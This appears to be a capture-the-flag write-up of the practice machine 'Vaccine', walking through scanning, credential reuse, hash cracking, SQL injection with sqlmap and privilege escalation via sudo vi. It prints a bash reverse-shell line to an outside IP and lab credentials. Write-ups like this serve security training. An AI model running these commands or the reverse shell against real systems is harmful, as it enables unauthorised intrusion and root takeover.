Vaccine

Introduction

This is the third machine in the starter series.

. . .

Scanning & Enumeration

> ------------------------Nmap Results-----------------------------<
--------------------------------------------------------------------
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-17 00:47 IST                                                                                                                               
Nmap scan report for 10.10.10.46                                                                                                                                                              
Host is up (0.61s latency).
PORT      STATE  SERVICE VERSION
21/tcp    open   ftp     vsftpd 3.0.3
22/tcp    open   ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp    open   http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
14234/tcp closed unknown
17893/tcp closed unknown
18044/tcp closed unknown
18748/tcp closed unknown
23160/tcp closed unknown
24259/tcp closed unknown
42671/tcp closed unknown
48212/tcp closed unknown
50329/tcp closed unknown
54529/tcp closed unknown
55507/tcp closed unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=6/17%OT=21%CT=14234%CU=34467%PV=Y%DS=2%DC=T%G=Y%TM=60C
OS:A4E8E%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)OPS(O1=M54BST11NW7%O2=M54BST11N
OS:W7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)WIN(W1=FE88
OS:%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54B
OS:NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R
OS:=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=
OS:AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=
OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID
OS:=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 18044/tcp)
HOP RTT       ADDRESS
1   426.59 ms 10.10.16.1
2   222.85 ms 10.10.10.46

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.08 seconds
--------------------------------------------------------------------

From the results above, let us populate our Service Version Enumeration Table.

Service Version Enumeration Table
Service Version Enumeration Table

FTP Enumeration

Tried anonymous login, did not work. Moving on to HTTP. Now we saw a config file on the last machine, where we got the creds, let us try that.
ftpuser / mc@F1l3ZilL4

Download the backup.zip file
Download the backup.zip file
Cracking the zip file
Cracking the zip file

The file was encrypted, so we used fcrack to crack the file.

Looking at the source code,

Source Code
Source Code

We found a MD5 2cb42f8734ea607eefed3b70af13bbd3. Let’s try to crack it.

Found the password using Crack Station
Found the password using Crack Station

admin : qwerty789 and we are able to log in.

HTTP Enumeration

Landing Page
Landing Page
Dashboard
Dashboard

Insert an ‘ ’ ’ in the search box to see if we have SQL injection.

. . .

Vulnerability Analysis

We notice we have sql injection. We can use sqlmap to exploit this.

. . .

Exploitation

Capture the request on search as req.txt

Capture the request
Capture the request
sqlmap -r req.txt
sqlmap -r req.txt --dbs

[*] information_schema
[*] pg_catalog
[*] public

I tried enumerating but at one point it felt like, its never ending. So I used the os-shell argument to get a shell, and then send back a reverse shell

sqlmap -r req.txt --os-shell
bash -c 'bash -i >& /dev/tcp/10.10.16.82/4444 0>&1'
. . .

Privesc

We go around looking for config files, and voila we found dashboard.php

Source code of dashboard
Source code of dashboard

Let us try to use sudo -l with this password.

User can run vi with sudo privileges
User can run vi with sudo privileges

use sudo vi /etc/postgresql/11/main/pg_hba.conf and then execute

`:! /bin/bash`

and we get root.

And finally, I was looking for user.txt files when I finally come across a file

Shell with root privileges
Shell with root privileges

There was no other users.txt file.

. . .

Summary | TL;DR

  1. Scan ports using Nmap
  2. Find FTP use the creds found on the last machine
  3. Login to the website, find SQL injection
  4. Find stored creds for Postgres user. With sudo -l find we can run vi as sudo
  5. Get root shell using :! /bin/bash
. . .

Parting Thoughts

In this machine, we learned the following:

  1. We should always use parameterized queries for database operations in applications
  2. We should be very careful with providing Sudo access to users. Providing Sudo access to Postgres users to execute vi or vim could easily lead to privilege escalation.

Thank you for reading, please provide your feedback and share it with people who are in need. :)

. . .